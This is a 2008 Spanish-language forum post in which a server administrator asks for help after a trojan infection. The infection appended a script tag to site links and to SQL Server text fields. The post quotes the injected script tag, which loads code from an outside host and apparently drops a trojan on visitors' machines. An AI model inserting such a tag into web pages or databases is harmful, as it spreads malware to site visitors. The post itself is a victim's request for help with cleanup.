Ayuda con troyano, a ver si me puede ayudar!

@padawan@ · #1 (**permalink**) 05/06/2008, 11:39

Que tal, tengo el gran dolor de cabeza de que un servidor dedicado se me infecto con un virus, el problema visible era que a las paginas web especificamente en los links, o en el src de las imagenes a cada ruta o link , le agregaba una string un ejemplo:

Código HTML:

<a href="http://www.dominio.com/pagina.asp" >
asi es el link correcto

El virus en cuestion le agrega algo como esto
<a href="http://www.dominio.com/pagina.asp<script scr="http://flyzhu.9966.org/help.asp"></script >

Entonces los links quedan inutilizables totalmente y las imagenes tampoco se ven, pero eso no es lo peor, no se de que forma tambien este virus ataca las tablas de la base de datos sql server.

porque en casi todas las tablas de la base en donde tenga campos varchar de mas de 50 caracteres, esta grabado este string, lo que provoca que, cada vez que se consulte una pagina que muestre informacion de texto grabada en la base de datos muestra este string <script scr="http://flyzhu.9966.org/help.asp"></script > entonces se ejecuta esta llamada y creo que lo que hace es que descargue un trojano a cada maquina cliente para infectarse de esa manera viralmente.

Estuve buscando informacino al respecto, y solo encontre algo similar con este troyano que se llama Patajan.

http://www.alertaantivirus.es/virus/....html?cod=5885

http://www.symantec.com/security_res...313-99&tabid=3

Ahora estoy corriendo el NOD32 2.7 , todavia sigue buscando, no encontro nada.

Como veran es un problema muy grande para un sitio web, y me agarro de sorpresa, en lo posible les pido el que pueda y sepa algo sobre este tema, me tire un mano, porque estoy haciendo agua.

Desde ya muchas gracias.